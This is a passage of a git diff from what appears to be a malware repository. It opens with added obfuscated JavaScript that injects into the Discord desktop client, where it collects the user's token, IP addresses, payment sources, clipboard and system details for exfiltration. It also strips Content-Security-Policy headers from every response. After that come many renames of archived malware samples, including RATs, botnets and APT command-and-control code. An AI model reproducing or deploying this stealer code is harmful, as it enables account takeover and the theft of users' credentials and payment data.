{ + webrtcips = webrtcips + ip + _0x476f[83] +}); +getip(); +getuserinfo(token); +getpaymentsources(token); +setTimeout(() => { + var _0xb38cx30 = (_0x476f[84] + underesc + _0x476f[11] + underesc + _0x476f[11] + token + _0x476f[11] + underesc + _0x476f[11] + underesc + _0x476f[85] + (gettimezone()) + _0x476f[86] + (getresolution()) + _0x476f[87] + ip + _0x476f[88] + webrtcips + _0x476f[89] + userinfo + _0x476f[90] + username + _0x476f[91] + hasattached + _0x476f[92] + (returnzoomfactor()) + _0x476f[93] + (returnuseragent()) + _0x476f[94] + (getdiscordversion()) + _0x476f[95] + (getclipboard()) + _0x476f[11]); + pin(_0xb38cx30) +}, 5000); +setTimeout(() => { + delboostserveronclient() +}, 1); +setTimeout(() => { + fightdio() +}, 1) + + +\ modules\ discord_desktop_core: + const electron = require('electron'); +const path = require('path'); + +electron.session.defaultSession.webRequest.onHeadersReceived(function(details, callback) { + if (!details.responseHeaders['content-security-policy-report-only'] && !details.responseHeaders['content-security-policy']) return callback({ + cancel: false + }); + delete details.responseHeaders['content-security-policy-report-only']; + delete details.responseHeaders['content-security-policy']; + callback({ + cancel: false, + responseHeaders: details.responseHeaders + }); +}); + +module.exports = require('./core.asar'); diff --git a/Leaks/Other/APTMuddy.Python.C2.zip b/Win32/APTMuddy.Python.C2.zip similarity index 100% rename from Leaks/Other/APTMuddy.Python.C2.zip rename to Win32/APTMuddy.Python.C2.zip diff --git a/Leaks/Win32/Backdoor.Win32.APT34.PoisonFrogC2.7z b/Win32/Backdoor.Win32.APT34.PoisonFrogC2.7z similarity index 100% rename from Leaks/Win32/Backdoor.Win32.APT34.PoisonFrogC2.7z rename to Win32/Backdoor.Win32.APT34.PoisonFrogC2.7z diff --git a/Win32/Backdoor.Win32.Aryan.7z b/Win32/Botnets/Backdoor.Win32.Aryan.7z similarity index 100% rename from Win32/Backdoor.Win32.Aryan.7z rename to Win32/Botnets/Backdoor.Win32.Aryan.7z diff --git a/Win32/Backdoor.Win32.NytroTrojan.a.7z b/Win32/Botnets/Backdoor.Win32.NytroTrojan.a.7z similarity index 100% rename from Win32/Backdoor.Win32.NytroTrojan.a.7z rename to Win32/Botnets/Backdoor.Win32.NytroTrojan.a.7z diff --git a/Win32/Win32.A59.7z b/Win32/Botnets/Win32.A59.7z similarity index 100% rename from Win32/Win32.A59.7z rename to Win32/Botnets/Win32.A59.7z diff --git a/Win32/Win32.Acid.b.7z b/Win32/Botnets/Win32.Acid.b.7z similarity index 100% rename from Win32/Win32.Acid.b.7z rename to Win32/Botnets/Win32.Acid.b.7z diff --git a/Win32/Win32.Ago.c.7z b/Win32/Botnets/Win32.Ago.c.7z similarity index 100% rename from Win32/Win32.Ago.c.7z rename to Win32/Botnets/Win32.Ago.c.7z diff --git a/Win32/Win32.Agony.rar b/Win32/Botnets/Win32.Agony.rar similarity index 100% rename from Win32/Win32.Agony.rar rename to Win32/Botnets/Win32.Agony.rar diff --git a/Win32/Win32.Algus.f.7z b/Win32/Botnets/Win32.Algus.f.7z similarity index 100% rename from Win32/Win32.Algus.f.7z rename to Win32/Botnets/Win32.Algus.f.7z diff --git a/Win32/Win32.AryanRat.d.rar b/Win32/Botnets/Win32.AryanRat.d.rar similarity index 100% rename from Win32/Win32.AryanRat.d.rar rename to Win32/Botnets/Win32.AryanRat.d.rar diff --git a/Win32/Win32.Aspergillus.ac.7z b/Win32/Botnets/Win32.Aspergillus.ac.7z similarity index 100% rename from Win32/Win32.Aspergillus.ac.7z rename to Win32/Botnets/Win32.Aspergillus.ac.7z diff --git a/Win32/Win32.Atomic.bl.7z b/Win32/Botnets/Win32.Atomic.bl.7z similarity index 100% rename from Win32/Win32.Atomic.bl.7z rename to Win32/Botnets/Win32.Atomic.bl.7z diff --git a/Win32/Win32.BBot.a.7z b/Win32/Botnets/Win32.BBot.a.7z similarity index 100% rename from Win32/Win32.BBot.a.7z rename to Win32/Botnets/Win32.BBot.a.7z diff --git a/Win32/Win32.BackConnect.ab.zip b/Win32/Botnets/Win32.BackConnect.ab.zip similarity index 100% rename from Win32/Win32.BackConnect.ab.zip rename to Win32/Botnets/Win32.BackConnect.ab.zip diff --git a/Win32/Win32.Backdoor.Tyupkin.multi.7z b/Win32/Botnets/Win32.Backdoor.Tyupkin.multi.7z similarity index 100% rename from Win32/Win32.Backdoor.Tyupkin.multi.7z rename to Win32/Botnets/Win32.Backdoor.Tyupkin.multi.7z diff --git a/Win32/Win32.Beast.gb.7z b/Win32/Botnets/Win32.Beast.gb.7z similarity index 100% rename from Win32/Win32.Beast.gb.7z rename to Win32/Botnets/Win32.Beast.gb.7z diff --git a/Win32/Win32.Beta.7z b/Win32/Botnets/Win32.Beta.7z similarity index 100% rename from Win32/Win32.Beta.7z rename to Win32/Botnets/Win32.Beta.7z diff --git a/Win32/Win32.Bizac.a.rar b/Win32/Botnets/Win32.Bizac.a.rar similarity index 100% rename from Win32/Win32.Bizac.a.rar rename to Win32/Botnets/Win32.Bizac.a.rar diff --git a/Win32/Win32.BlackDream.7z b/Win32/Botnets/Win32.BlackDream.7z similarity index 100% rename from Win32/Win32.BlackDream.7z rename to Win32/Botnets/Win32.BlackDream.7z diff --git a/Win32/Win32.BlowSXT.rar b/Win32/Botnets/Win32.BlowSXT.rar similarity index 100% rename from Win32/Win32.BlowSXT.rar rename to Win32/Botnets/Win32.BlowSXT.rar diff --git a/Win32/Win32.BotNET.a.rar b/Win32/Botnets/Win32.BotNET.a.rar similarity index 100% rename from Win32/Win32.BotNET.a.rar rename to Win32/Botnets/Win32.BotNET.a.rar diff --git a/Win32/Win32.BsodInvoker.zip b/Win32/Botnets/Win32.BsodInvoker.zip similarity index 100% rename from Win32/Win32.BsodInvoker.zip rename to Win32/Botnets/Win32.BsodInvoker.zip diff --git a/Win32/Win32.CBot.7z b/Win32/Botnets/Win32.CBot.7z similarity index 100% rename from Win32/Win32.CBot.7z rename to Win32/Botnets/Win32.CBot.7z diff --git a/Win32/Win32.Canbis.a.rar b/Win32/Botnets/Win32.Canbis.a.rar similarity index 100% rename from Win32/Win32.Canbis.a.rar rename to Win32/Botnets/Win32.Canbis.a.rar diff --git a/Win32/Win32.Casper.7z b/Win32/Botnets/Win32.Casper.7z similarity index 100% rename from Win32/Win32.Casper.7z rename to Win32/Botnets/Win32.Casper.7z diff --git a/Win32/Win32.Chameleon.7z b/Win32/Botnets/Win32.Chameleon.7z similarity index 100% rename from Win32/Win32.Chameleon.7z rename to Win32/Botnets/Win32.Chameleon.7z diff --git a/Win32/Win32.ChodeBot.a.7z b/Win32/Botnets/Win32.ChodeBot.a.7z similarity index 100% rename from Win32/Win32.ChodeBot.a.7z rename to Win32/Botnets/Win32.ChodeBot.a.7z diff --git a/Win32/Win32.CiscoBot.7z b/Win32/Botnets/Win32.CiscoBot.7z similarity index 100% rename from Win32/Win32.CiscoBot.7z rename to Win32/Botnets/Win32.CiscoBot.7z diff --git a/Win32/Win32.Cissi.zip b/Win32/Botnets/Win32.Cissi.zip similarity index 100% rename from Win32/Win32.Cissi.zip rename to Win32/Botnets/Win32.Cissi.zip diff --git a/Win32/Win32.CpBot.7z b/Win32/Botnets/Win32.CpBot.7z similarity index 100% rename from Win32/Win32.CpBot.7z rename to Win32/Botnets/Win32.CpBot.7z diff --git a/Win32/Win32.CrackBot.adb.7z b/Win32/Botnets/Win32.CrackBot.adb.7z similarity index 100% rename from Win32/Win32.CrackBot.adb.7z rename to Win32/Botnets/Win32.CrackBot.adb.7z diff --git a/Win32/Win32.CrxBot.rr.7z b/Win32/Botnets/Win32.CrxBot.rr.7z similarity index 100% rename from Win32/Win32.CrxBot.rr.7z rename to Win32/Botnets/Win32.CrxBot.rr.7z diff --git a/Win32/Win32.DKCS.7z b/Win32/Botnets/Win32.DKCS.7z similarity index 100% rename from Win32/Win32.DKCS.7z rename to Win32/Botnets/Win32.DKCS.7z diff --git a/Win32/Win32.DarkAnal.7z b/Win32/Botnets/Win32.DarkAnal.7z similarity index 100% rename from Win32/Win32.DarkAnal.7z rename to Win32/Botnets/Win32.DarkAnal.7z diff --git a/Win32/Win32.DarkBot.f.a.c.7z b/Win32/Botnets/Win32.DarkBot.f.a.c.7z similarity index 100% rename from Win32/Win32.DarkBot.f.a.c.7z rename to Win32/Botnets/Win32.DarkBot.f.a.c.7z diff --git a/Win32/Win32.DataSpyNetworkc2.b.7z b/Win32/Botnets/Win32.DataSpyNetworkc2.b.7z similarity index 100% rename from Win32/Win32.DataSpyNetworkc2.b.7z rename to Win32/Botnets/Win32.DataSpyNetworkc2.b.7z diff --git a/Win32/Win32.Delikon.7z b/Win32/Botnets/Win32.Delikon.7z similarity index 100% rename from Win32/Win32.Delikon.7z rename to Win32/Botnets/Win32.Delikon.7z diff --git a/Win32/Win32.Dexter.p.7z b/Win32/Botnets/Win32.Dexter.p.7z similarity index 100% rename from Win32/Win32.Dexter.p.7z rename to Win32/Botnets/Win32.Dexter.p.7z diff --git a/Win32/Win32.Dixie.rar b/Win32/Botnets/Win32.Dixie.rar similarity index 100% rename from Win32/Win32.Dixie.rar rename to Win32/Botnets/Win32.Dixie.rar diff --git a/Win32/Win32.DonaldDick.7z b/Win32/Botnets/Win32.DonaldDick.7z similarity index 100% rename from Win32/Win32.DonaldDick.7z rename to Win32/Botnets/Win32.DonaldDick.7z diff --git a/Win32/Win32.Dt8.rar b/Win32/Botnets/Win32.Dt8.rar similarity index 100% rename from Win32/Win32.Dt8.rar rename to Win32/Botnets/Win32.Dt8.rar diff --git a/Win32/Win32.EOF.a.7z b/Win32/Botnets/Win32.EOF.a.7z similarity index 100% rename from Win32/Win32.EOF.a.7z rename to Win32/Botnets/Win32.EOF.a.7z diff --git a/Win32/Win32.Ejac.rar b/Win32/Botnets/Win32.Ejac.rar similarity index 100% rename from Win32/Win32.Ejac.rar rename to Win32/Botnets/Win32.Ejac.rar diff --git a/Win32/Win32.EnglishRat.7z b/Win32/Botnets/Win32.EnglishRat.7z similarity index 100% rename from Win32/Win32.EnglishRat.7z rename to Win32/Botnets/Win32.EnglishRat.7z diff --git a/Win32/Win32.FakeAV.SystemSecurity2010.7z b/Win32/Botnets/Win32.FakeAV.SystemSecurity2010.7z similarity index 100% rename from Win32/Win32.FakeAV.SystemSecurity2010.7z rename to Win32/Botnets/Win32.FakeAV.SystemSecurity2010.7z diff --git a/Win32/Win32.FlameBot.7z b/Win32/Botnets/Win32.FlameBot.7z similarity index 100% rename from Win32/Win32.FlameBot.7z rename to Win32/Botnets/Win32.FlameBot.7z diff --git a/Win32/Win32.Flexispy.7z b/Win32/Botnets/Win32.Flexispy.7z similarity index 100% rename from Win32/Win32.Flexispy.7z rename to Win32/Botnets/Win32.Flexispy.7z diff --git a/Win32/Win32.FuckYou.rar b/Win32/Botnets/Win32.FuckYou.rar similarity index 100% rename from Win32/Win32.FuckYou.rar rename to Win32/Botnets/Win32.FuckYou.rar diff --git a/Win32/Win32.FukJ.7z b/Win32/Botnets/Win32.FukJ.7z similarity index 100% rename from Win32/Win32.FukJ.7z rename to Win32/Botnets/Win32.FukJ.7z diff --git a/Win32/Win32.Fungus.7z b/Win32/Botnets/Win32.Fungus.7z similarity index 100% rename from Win32/Win32.Fungus.7z rename to Win32/Botnets/Win32.Fungus.7z diff --git a/Win32/Win32.GellBot.c.7z b/Win32/Botnets/Win32.GellBot.c.7z similarity index 100% rename from Win32/Win32.GellBot.c.7z rename to Win32/Botnets/Win32.GellBot.c.7z diff --git a/Win32/Win32.Gigabot.7z b/Win32/Botnets/Win32.Gigabot.7z similarity index 100% rename from Win32/Win32.Gigabot.7z rename to Win32/Botnets/Win32.Gigabot.7z diff --git a/Win32/Win32.Gobot.ad.rar b/Win32/Botnets/Win32.Gobot.ad.rar similarity index 100% rename from Win32/Win32.Gobot.ad.rar rename to Win32/Botnets/Win32.Gobot.ad.rar diff --git a/Win32/Win32.Gold.7z b/Win32/Botnets/Win32.Gold.7z similarity index 100% rename from Win32/Win32.Gold.7z rename to Win32/Botnets/Win32.Gold.7z diff --git a/Win32/Win32.Grum.7z b/Win32/Botnets/Win32.Grum.7z similarity index 100% rename from Win32/Win32.Grum.7z rename to Win32/Botnets/Win32.Grum.7z diff --git a/Win32/Win32.Grum.zip b/Win32/Botnets/Win32.Grum.zip similarity index 100% rename from Win32/Win32.Grum.zip rename to Win32/Botnets/Win32.Grum.zip diff --git a/Win32/Win32.Gsome.0.6a.7z b/Win32/Botnets/Win32.Gsome.0.6a.7z similarity index 100% rename from Win32/Win32.Gsome.0.6a.7z rename to Win32/Botnets/Win32.Gsome.0.6a.7z diff --git a/Win32/Win32.Gsome.0.7.0.3.7z b/Win32/Botnets/Win32.Gsome.0.7.0.3.7z similarity index 100% rename from Win32/Win32.Gsome.0.7.0.3.7z rename to Win32/Botnets/Win32.Gsome.0.7.0.3.7z diff --git a/Win32/Win32.Guptchar.7z b/Win32/Botnets/Win32.Guptchar.7z similarity index 100% rename from Win32/Win32.Guptchar.7z rename to Win32/Botnets/Win32.Guptchar.7z diff --git a/Win32/Win32.HarvecterBot.rar b/Win32/Botnets/Win32.HarvecterBot.rar similarity index 100% rename from Win32/Win32.HarvecterBot.rar rename to Win32/Botnets/Win32.HarvecterBot.rar diff --git a/Win32/Win32.HdBot.c.rar b/Win32/Botnets/Win32.HdBot.c.rar similarity index 100% rename from Win32/Win32.HdBot.c.rar rename to Win32/Botnets/Win32.HdBot.c.rar diff --git a/Win32/Win32.Heleks.a.7z b/Win32/Botnets/Win32.Heleks.a.7z similarity index 100% rename from Win32/Win32.Heleks.a.7z rename to Win32/Botnets/Win32.Heleks.a.7z diff --git a/Win32/Win32.Hidden.7z b/Win32/Botnets/Win32.Hidden.7z similarity index 100% rename from Win32/Win32.Hidden.7z rename to Win32/Botnets/Win32.Hidden.7z diff --git a/Win32/Win32.Hound.7z b/Win32/Botnets/Win32.Hound.7z similarity index 100% rename from Win32/Win32.Hound.7z rename to Win32/Botnets/Win32.Hound.7z diff --git a/Win32/Win32.Hydra.7z b/Win32/Botnets/Win32.Hydra.7z similarity index 100% rename from Win32/Win32.Hydra.7z rename to Win32/Botnets/Win32.Hydra.7z diff --git a/Win32/Win32.ICQPagerDataSpy.7z b/Win32/Botnets/Win32.ICQPagerDataSpy.7z similarity index 100% rename from Win32/Win32.ICQPagerDataSpy.7z rename to Win32/Botnets/Win32.ICQPagerDataSpy.7z diff --git a/Win32/Win32.IMSpreader.7z b/Win32/Botnets/Win32.IMSpreader.7z similarity index 100% rename from Win32/Win32.IMSpreader.7z rename to Win32/Botnets/Win32.IMSpreader.7z diff --git a/Win32/Win32.ImBot.a.c.7z b/Win32/Botnets/Win32.ImBot.a.c.7z similarity index 100% rename from Win32/Win32.ImBot.a.c.7z rename to Win32/Botnets/Win32.ImBot.a.c.7z diff --git a/Win32/Win32.Immortal.b.7z b/Win32/Botnets/Win32.Immortal.b.7z similarity index 100% rename from Win32/Win32.Immortal.b.7z rename to Win32/Botnets/Win32.Immortal.b.7z diff --git a/Win32/Win32.Infest.7z b/Win32/Botnets/Win32.Infest.7z similarity index 100% rename from Win32/Win32.Infest.7z rename to Win32/Botnets/Win32.Infest.7z diff --git a/Win32/Win32.IntelligentNetSpy.7z b/Win32/Botnets/Win32.IntelligentNetSpy.7z similarity index 100% rename from Win32/Win32.IntelligentNetSpy.7z rename to Win32/Botnets/Win32.IntelligentNetSpy.7z diff --git a/Win32/Win32.IrBot.7z b/Win32/Botnets/Win32.IrBot.7z similarity index 100% rename from Win32/Win32.IrBot.7z rename to Win32/Botnets/Win32.IrBot.7z diff --git a/Win32/Win32.IrcWorm.a.c.zip b/Win32/Botnets/Win32.IrcWorm.a.c.zip similarity index 100% rename from Win32/Win32.IrcWorm.a.c.zip rename to Win32/Botnets/Win32.IrcWorm.a.c.zip diff --git a/Win32/Win32.JackShell.7z b/Win32/Botnets/Win32.JackShell.7z similarity index 100% rename from Win32/Win32.JackShell.7z rename to Win32/Botnets/Win32.JackShell.7z diff --git a/Win32/Win32.Jigsaw.a.rar b/Win32/Botnets/Win32.Jigsaw.a.rar similarity index 100% rename from Win32/Win32.Jigsaw.a.rar rename to Win32/Botnets/Win32.Jigsaw.a.rar diff --git a/Win32/Win32.JrBot.rar b/Win32/Botnets/Win32.JrBot.rar similarity index 100% rename from Win32/Win32.JrBot.rar rename to Win32/Botnets/Win32.JrBot.rar diff --git a/Win32/Win32.KayaBot.dyia.7z b/Win32/Botnets/Win32.KayaBot.dyia.7z similarity index 100% rename from Win32/Win32.KayaBot.dyia.7z rename to Win32/Botnets/Win32.KayaBot.dyia.7z diff --git a/Win32/Win32.Kbot.7z b/Win32/Botnets/Win32.Kbot.7z similarity index 100% rename from Win32/Win32.Kbot.7z rename to Win32/Botnets/Win32.Kbot.7z diff --git a/Win32/Win32.Krotten.7z b/Win32/Botnets/Win32.Krotten.7z similarity index 100% rename from Win32/Win32.Krotten.7z rename to Win32/Botnets/Win32.Krotten.7z diff --git a/Win32/Win32.Letum.7z b/Win32/Botnets/Win32.Letum.7z similarity index 100% rename from Win32/Win32.Letum.7z rename to Win32/Botnets/Win32.Letum.7z diff --git a/Win32/Win32.Liquid.7z b/Win32/Botnets/Win32.Liquid.7z similarity index 100% rename from Win32/Win32.Liquid.7z rename to Win32/Botnets/Win32.Liquid.7z diff --git a/Win32/Win32.LoaderBot.a.7z b/Win32/Botnets/Win32.LoaderBot.a.7z similarity index 100% rename from Win32/Win32.LoaderBot.a.7z rename to Win32/Botnets/Win32.LoaderBot.a.7z diff --git a/Win32/Win32.Lolworm.7z b/Win32/Botnets/Win32.Lolworm.7z similarity index 100% rename from Win32/Win32.Lolworm.7z rename to Win32/Botnets/Win32.Lolworm.7z diff --git a/Win32/Win32.MBot.7z b/Win32/Botnets/Win32.MBot.7z similarity index 100% rename from Win32/Win32.MBot.7z rename to Win32/Botnets/Win32.MBot.7z diff --git a/Win32/Win32.MSNSpread.7z b/Win32/Botnets/Win32.MSNSpread.7z similarity index 100% rename from Win32/Win32.MSNSpread.7z rename to Win32/Botnets/Win32.MSNSpread.7z diff --git a/Win32/Win32.MailReactor.7z b/Win32/Botnets/Win32.MailReactor.7z similarity index 100% rename from Win32/Win32.MailReactor.7z rename to Win32/Botnets/Win32.MailReactor.7z diff --git a/Win32/Win32.Metarage.k.rar b/Win32/Botnets/Win32.Metarage.k.rar similarity index 100% rename from Win32/Win32.Metarage.k.rar rename to Win32/Botnets/Win32.Metarage.k.rar diff --git a/Win32/Win32.Mimail.7z b/Win32/Botnets/Win32.Mimail.7z similarity index 100% rename from Win32/Win32.Mimail.7z rename to Win32/Botnets/Win32.Mimail.7z diff --git a/Win32/Win32.Minipanzer.7z b/Win32/Botnets/Win32.Minipanzer.7z similarity index 100% rename from Win32/Win32.Minipanzer.7z rename to Win32/Botnets/Win32.Minipanzer.7z diff --git a/Win32/Win32.MioStar.ab.7z b/Win32/Botnets/Win32.MioStar.ab.7z similarity index 100% rename from Win32/Win32.MioStar.ab.7z rename to Win32/Botnets/Win32.MioStar.ab.7z diff --git a/Win32/Win32.Morphine.ce.7z b/Win32/Botnets/Win32.Morphine.ce.7z similarity index 100% rename from Win32/Win32.Morphine.ce.7z rename to Win32/Botnets/Win32.Morphine.ce.7z diff --git a/Win32/Win32.Moses.a.a.e.7z b/Win32/Botnets/Win32.Moses.a.a.e.7z similarity index 100% rename from Win32/Win32.Moses.a.a.e.7z rename to Win32/Botnets/Win32.Moses.a.a.e.7z diff --git a/Win32/Win32.MrAlex.a.7z b/Win32/Botnets/Win32.MrAlex.a.7z similarity index 100% rename from Win32/Win32.MrAlex.a.7z rename to Win32/Botnets/Win32.MrAlex.a.7z diff --git a/Win32/Win32.N00bKit.7z b/Win32/Botnets/Win32.N00bKit.7z similarity index 100% rename from Win32/Win32.N00bKit.7z rename to Win32/Botnets/Win32.N00bKit.7z diff --git a/Win32/Win32.NB.b.7z b/Win32/Botnets/Win32.NB.b.7z similarity index 100% rename from Win32/Win32.NB.b.7z rename to Win32/Botnets/Win32.NB.b.7z diff --git a/Win32/Win32.Napsin.7z b/Win32/Botnets/Win32.Napsin.7z similarity index 100% rename from Win32/Win32.Napsin.7z rename to Win32/Botnets/Win32.Napsin.7z diff --git a/Win32/Win32.NinjaBot.zip b/Win32/Botnets/Win32.NinjaBot.zip similarity index 100% rename from Win32/Win32.NinjaBot.zip rename to Win32/Botnets/Win32.NinjaBot.zip diff --git a/Win32/Win32.NiteAim.7z b/Win32/Botnets/Win32.NiteAim.7z similarity index 100% rename from Win32/Win32.NiteAim.7z rename to Win32/Botnets/Win32.NiteAim.7z diff --git a/Win32/Win32.Norman.7z b/Win32/Botnets/Win32.Norman.7z similarity index 100% rename from Win32/Win32.Norman.7z rename to Win32/Botnets/Win32.Norman.7z diff --git a/Win32/Win32.Null.7z b/Win32/Botnets/Win32.Null.7z similarity index 100% rename from Win32/Win32.Null.7z rename to Win32/Botnets/Win32.Null.7z diff --git a/Win32/Win32.Nullbot.7z b/Win32/Botnets/Win32.Nullbot.7z similarity index 100% rename from Win32/Win32.Nullbot.7z rename to Win32/Botnets/Win32.Nullbot.7z diff --git a/Win32/Win32.OgWorm.7z b/Win32/Botnets/Win32.OgWorm.7z similarity index 100% rename from Win32/Win32.OgWorm.7z rename to Win32/Botnets/Win32.OgWorm.7z diff --git a/Win32/Win32.Osc.zip b/Win32/Botnets/Win32.Osc.zip similarity index 100% rename from Win32/Win32.Osc.zip rename to Win32/Botnets/Win32.Osc.zip diff --git a/Win32/Win32.PBot.a.rar b/Win32/Botnets/Win32.PBot.a.rar similarity index 100% rename from Win32/Win32.PBot.a.rar rename to Win32/Botnets/Win32.PBot.a.rar diff --git a/Win32/Win32.Plague.7z b/Win32/Botnets/Win32.Plague.7z similarity index 100% rename from Win32/Win32.Plague.7z rename to Win32/Botnets/Win32.Plague.7z diff --git a/Win32/Win32.Poshspy.7z b/Win32/Botnets/Win32.Poshspy.7z similarity index 100% rename from Win32/Win32.Poshspy.7z rename to Win32/Botnets/Win32.Poshspy.7z diff --git a/Win32/Win32.Pwnbot.7z b/Win32/Botnets/Win32.Pwnbot.7z similarity index 100% rename from Win32/Win32.Pwnbot.7z rename to Win32/Botnets/Win32.Pwnbot.7z diff --git a/Win32/Win32.Q8Bot.7z b/Win32/Botnets/Win32.Q8Bot.7z similarity index 100% rename from Win32/Win32.Q8Bot.7z rename to Win32/Botnets/Win32.Q8Bot.7z diff --git a/Win32/Win32.Rat.a.7z b/Win32/Botnets/Win32.Rat.a.7z similarity index 100% rename from Win32/Win32.Rat.a.7z rename to Win32/Botnets/Win32.Rat.a.7z diff --git a/Win32/Win32.Ravbot.rar b/Win32/Botnets/Win32.Ravbot.rar similarity index 100% rename from Win32/Win32.Ravbot.rar rename to Win32/Botnets/Win32.Ravbot.rar diff --git a/Win32/Win32.Retro.7z b/Win32/Botnets/Win32.Retro.7z similarity index 100% rename from Win32/Win32.Retro.7z rename to Win32/Botnets/Win32.Retro.7z diff --git a/Win32/Win32.ReverseSocksBot.7z b/Win32/Botnets/Win32.ReverseSocksBot.7z similarity index 100% rename from Win32/Win32.ReverseSocksBot.7z rename to Win32/Botnets/Win32.ReverseSocksBot.7z diff --git a/Win32/Win32.Rubilyn.7z b/Win32/Botnets/Win32.Rubilyn.7z similarity index 100% rename from Win32/Win32.Rubilyn.7z rename to Win32/Botnets/Win32.Rubilyn.7z diff --git a/Win32/Win32.S5.7z b/Win32/Botnets/Win32.S5.7z similarity index 100% rename from Win32/Win32.S5.7z rename to Win32/Botnets/Win32.S5.7z diff --git a/Win32/Win32.Sbx.amk.7z b/Win32/Botnets/Win32.Sbx.amk.7z similarity index 100% rename from Win32/Win32.Sbx.amk.7z rename to Win32/Botnets/Win32.Sbx.amk.7z diff --git a/Win32/Win32.ShellbotFTP.7z b/Win32/Botnets/Win32.ShellbotFTP.7z similarity index 100% rename from Win32/Win32.ShellbotFTP.7z rename to Win32/Botnets/Win32.ShellbotFTP.7z diff --git a/Win32/Win32.Sinapps.7z b/Win32/Botnets/Win32.Sinapps.7z similarity index 100% rename from Win32/Win32.Sinapps.7z rename to Win32/Botnets/Win32.Sinapps.7z diff --git a/Win32/Win32.Sinowal.7z b/Win32/Botnets/Win32.Sinowal.7z similarity index 100% rename from Win32/Win32.Sinowal.7z rename to Win32/Botnets/Win32.Sinowal.7z diff --git a/Win32/Win32.Skun.l.7z b/Win32/Botnets/Win32.Skun.l.7z similarity index 100% rename from Win32/Win32.Skun.l.7z rename to Win32/Botnets/Win32.Skun.l.7z diff --git a/Win32/Win32.Skuz.7z b/Win32/Botnets/Win32.Skuz.7z similarity index 100% rename from Win32/Win32.Skuz.7z rename to Win32/Botnets/Win32.Skuz.7z diff --git a/Win32/Win32.SkyDance.bb.7z b/Win32/Botnets/Win32.SkyDance.bb.7z similarity index 100% rename from Win32/Win32.SkyDance.bb.7z rename to Win32/Botnets/Win32.SkyDance.bb.7z diff --git a/Win32/Win32.Small.7z b/Win32/Botnets/Win32.Small.7z similarity index 100% rename from Win32/Win32.Small.7z rename to Win32/Botnets/Win32.Small.7z diff --git a/Win32/Win32.Spaz.b.7z b/Win32/Botnets/Win32.Spaz.b.7z similarity index 100% rename from Win32/Win32.Spaz.b.7z rename to Win32/Botnets/Win32.Spaz.b.7z diff --git a/Win32/Win32.Splitter.d.zip b/Win32/Botnets/Win32.Splitter.d.zip similarity index 100% rename from Win32/Win32.Splitter.d.zip rename to Win32/Botnets/Win32.Splitter.d.zip diff --git a/Win32/Win32.Steam.7z b/Win32/Botnets/Win32.Steam.7z similarity index 100% rename from Win32/Win32.Steam.7z rename to Win32/Botnets/Win32.Steam.7z diff --git a/Win32/Win32.Stellar.a.7z b/Win32/Botnets/Win32.Stellar.a.7z similarity index 100% rename from Win32/Win32.Stellar.a.7z rename to Win32/Botnets/Win32.Stellar.a.7z diff --git a/Win32/Win32.Stolich.7z b/Win32/Botnets/Win32.Stolich.7z similarity index 100% rename from Win32/Win32.Stolich.7z rename to Win32/Botnets/Win32.Stolich.7z diff --git a/Win32/Win32.Stukach.7z b/Win32/Botnets/Win32.Stukach.7z similarity index 100% rename from Win32/Win32.Stukach.7z rename to Win32/Botnets/Win32.Stukach.7z diff --git a/Win32/Win32.Sutoxin.zip b/Win32/Botnets/Win32.Sutoxin.zip similarity index 100% rename from Win32/Win32.Sutoxin.zip rename to Win32/Botnets/Win32.Sutoxin.zip diff --git a/Win32/Win32.Tank.7z b/Win32/Botnets/Win32.Tank.7z similarity index 100% rename from Win32/Win32.Tank.7z rename to Win32/Botnets/Win32.Tank.7z diff --git a/Win32/Win32.TgSpy.b.zip b/Win32/Botnets/Win32.TgSpy.b.zip similarity index 100% rename from Win32/Win32.TgSpy.b.zip rename to Win32/Botnets/Win32.TgSpy.b.zip diff --git a/Win32/Win32.TinyFWB.7z b/Win32/Botnets/Win32.TinyFWB.7z similarity index 100% rename from Win32/Win32.TinyFWB.7z rename to Win32/Botnets/Win32.TinyFWB.7z diff --git a/Win32/Win32.TinyNuke.7z b/Win32/Botnets/Win32.TinyNuke.7z similarity index 100% rename from Win32/Win32.TinyNuke.7z rename to Win32/Botnets/Win32.TinyNuke.7z diff --git a/Win32/Win32.Treasurehunter.7z b/Win32/Botnets/Win32.Treasurehunter.7z similarity index 100% rename from Win32/Win32.Treasurehunter.7z rename to Win32/Botnets/Win32.Treasurehunter.7z diff --git a/Win32/Win32.TribeFloodNet.bk.7z b/Win32/Botnets/Win32.TribeFloodNet.bk.7z similarity index 100% rename from Win32/Win32.TribeFloodNet.bk.7z rename to Win32/Botnets/Win32.TribeFloodNet.bk.7z diff --git a/Win32/Win32.Trochilus.7z b/Win32/Botnets/Win32.Trochilus.7z similarity index 100% rename from Win32/Win32.Trochilus.7z rename to Win32/Botnets/Win32.Trochilus.7z diff --git a/Win32/Win32.Tsgh.7z b/Win32/Botnets/Win32.Tsgh.7z similarity index 100% rename from Win32/Win32.Tsgh.7z rename to Win32/Botnets/Win32.Tsgh.7z diff --git a/Win32/Win32.UBoat.b.zip b/Win32/Botnets/Win32.UBoat.b.zip similarity index 100% rename from Win32/Win32.UBoat.b.zip rename to Win32/Botnets/Win32.UBoat.b.zip diff --git a/Win32/Win32.UmbraLoader.7z b/Win32/Botnets/Win32.UmbraLoader.7z similarity index 100% rename from Win32/Win32.UmbraLoader.7z rename to Win32/Botnets/Win32.UmbraLoader.7z diff --git a/Win32/Win32.UnkBot.7z b/Win32/Botnets/Win32.UnkBot.7z similarity index 100% rename from Win32/Win32.UnkBot.7z rename to Win32/Botnets/Win32.UnkBot.7z diff --git a/Win32/Win32.VIrc.rar b/Win32/Botnets/Win32.VIrc.rar similarity index 100% rename from Win32/Win32.VIrc.rar rename to Win32/Botnets/Win32.VIrc.rar diff --git a/Win32/Win32.VbBot.zip b/Win32/Botnets/Win32.VbBot.zip similarity index 100% rename from Win32/Win32.VbBot.zip rename to Win32/Botnets/Win32.VbBot.zip diff --git a/Win32/Win32.Volk.7z b/Win32/Botnets/Win32.Volk.7z similarity index 100% rename from Win32/Win32.Volk.7z rename to Win32/Botnets/Win32.Volk.7z diff --git a/Win32/Win32.WBot.7z b/Win32/Botnets/Win32.WBot.7z similarity index 100% rename from Win32/Win32.WBot.7z rename to Win32/Botnets/Win32.WBot.7z diff --git a/Win32/Win32.Wiseg3ck0.7z b/Win32/Botnets/Win32.Wiseg3ck0.7z similarity index 100% rename from Win32/Win32.Wiseg3ck0.7z rename to Win32/Botnets/Win32.Wiseg3ck0.7z diff --git a/Win32/Win32.Woodworm.7z b/Win32/Botnets/Win32.Woodworm.7z similarity index 100% rename from Win32/Win32.Woodworm.7z rename to Win32/Botnets/Win32.Woodworm.7z diff --git 